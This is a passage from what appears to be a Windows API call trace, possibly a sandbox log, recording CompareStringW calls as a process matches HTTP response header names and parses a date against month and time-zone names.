lpString1="Transfer-Encoding", cchCount1=17, lpString2="Cache-control", cchCount2=13) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Cache-control", cchCount2=13) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Cache-control", cchCount2=13) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Connection", cchCount2=10) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Connection", cchCount2=10) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Connection", cchCount2=10) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Connection", cchCount2=10) returned 1 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Connection", cchCount2=10) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Connection", cchCount2=10) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Connection", cchCount2=10) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Content-Version", cchCount2=15) returned 1 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Version", cchCount2=15) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Version", cchCount2=15) returned 1 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Content-Version", cchCount2=15) returned 1 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Content-Disposition", cchCount2=19) returned 1 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Disposition", cchCount2=19) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Disposition", cchCount2=19) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Content-Disposition", cchCount2=19) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 3 [0221.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Content-Encoding", cchCount2=16) returned 1 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Encoding", cchCount2=16) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Encoding", cchCount2=16) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Content-Encoding", cchCount2=16) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Content-Language", cchCount2=16) returned 1 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Language", cchCount2=16) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Language", cchCount2=16) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Content-Language", cchCount2=16) returned 2 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Type", cchCount2=12) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Type", cchCount2=12) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Type", cchCount2=12) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Content-Type", cchCount2=12) returned 1 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Type", cchCount2=12) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="utf-8", cchCount1=1, lpString2="\"", cchCount2=1) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="charset", cchCount1=7, lpString2="charset", cchCount2=7) returned 2 [0221.693] GetCurrentThreadId () returned 0xc04 [0221.693] GetCurrentThreadId () returned 0xc04 [0221.693] GetCurrentThreadId () returned 0xc04 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Content-Length", cchCount2=14) returned 1 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Length", cchCount2=14) returned 3 [0221.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Length", cchCount2=14) returned 3 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Content-Length", cchCount2=14) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 3 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept-Ranges", cchCount1=13, lpString2="Content-Range", cchCount2=13) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Range", cchCount2=13) returned 3 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Range", cchCount2=13) returned 3 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Language", cchCount1=16, lpString2="Content-Range", cchCount2=13) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Date", cchCount2=4) returned 2 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fri", cchCount1=3, lpString2="SUN", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fri", cchCount1=3, lpString2="MON", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fri", cchCount1=3, lpString2="TUE", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fri", cchCount1=3, lpString2="WED", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fri", cchCount1=3, lpString2="THU", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fri", cchCount1=3, lpString2="FRI", cchCount2=3) returned 2 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="JAN", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="FEB", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="MAR", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="APR", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="MAY", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="JUN", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="JUL", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="AUG", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="SEP", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="OCT", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="NOV", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="DEC", cchCount2=3) returned 1 [0221.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="JUNE", cchCount2=4) returned 1 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="JULY", cchCount2=4) returned 1 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="MRZ", cchCount2=3) returned 1 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="DEZ", cchCount2=3) returned 1 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="ENO", cchCount2=3) returned 1 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="FBRO", cchCount2=4) returned 1 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="MZO", cchCount2=3) returned 1 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="AB", cchCount2=2) returned 1 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="AGTO", cchCount2=4) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="SBRE", cchCount2=4) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="OBRE", cchCount2=4) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="NBRE", cchCount2=4) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="DBRE", cchCount2=4) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="MRT", cchCount2=3) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="MEI", cchCount2=3) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="JANV", cchCount2=4) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="FÉV", cchCount2=3) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="MARS", cchCount2=4) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="AVR", cchCount2=3) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="JUIN", cchCount2=4) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="JUIL", cchCount2=4) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="AOÛ", cchCount2=3) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="DÉC", cchCount2=3) returned 1 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="FÉVR", cchCount2=4) returned 1 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="JUI", cchCount2=3) returned 1 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="AOÛT", cchCount2=4) returned 1 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="MAJ", cchCount2=3) returned 1 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="AVG", cchCount2=3) returned 1 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="02", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sep", cchCount1=3, lpString2="JAN", cchCount2=3) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sep", cchCount1=3, lpString2="FEB", cchCount2=3) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sep", cchCount1=3, lpString2="MAR", cchCount2=3) returned 3 [0221.697] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sep", cchCount1=3, lpString2="APR", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sep", cchCount1=3, lpString2="MAY", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sep", cchCount1=3, lpString2="JUN", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sep", cchCount1=3, lpString2="JUL", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sep", cchCount1=3, lpString2="AUG", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sep", cchCount1=3, lpString2="SEP", cchCount2=3) returned 2 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="A", cchCount2=1) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACDT", cchCount2=4) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACST", cchCount2=4) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ADT", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEDT", cchCount2=4) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEST", cchCount2=4) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKDT", cchCount2=4) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKST", cchCount2=4) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWDT", cchCount2=4) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWST", cchCount2=4) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="B", cchCount2=1) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="C", cchCount2=1) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEDT", cchCount2=4) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEST", cchCount2=4) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CET", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CXT", cchCount2=3) returned 3 [0221.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="D", cchCount2=1) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="E", cchCount2=1) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EDT", cchCount2=3) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EDT", cchCount2=3) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EEDT", cchCount2=4) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EEST", cchCount2=4) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EET", cchCount2=3) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0221.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="F", cchCount2=1) returned 3 [0221.699] CompareStringW (Locale=0x400, 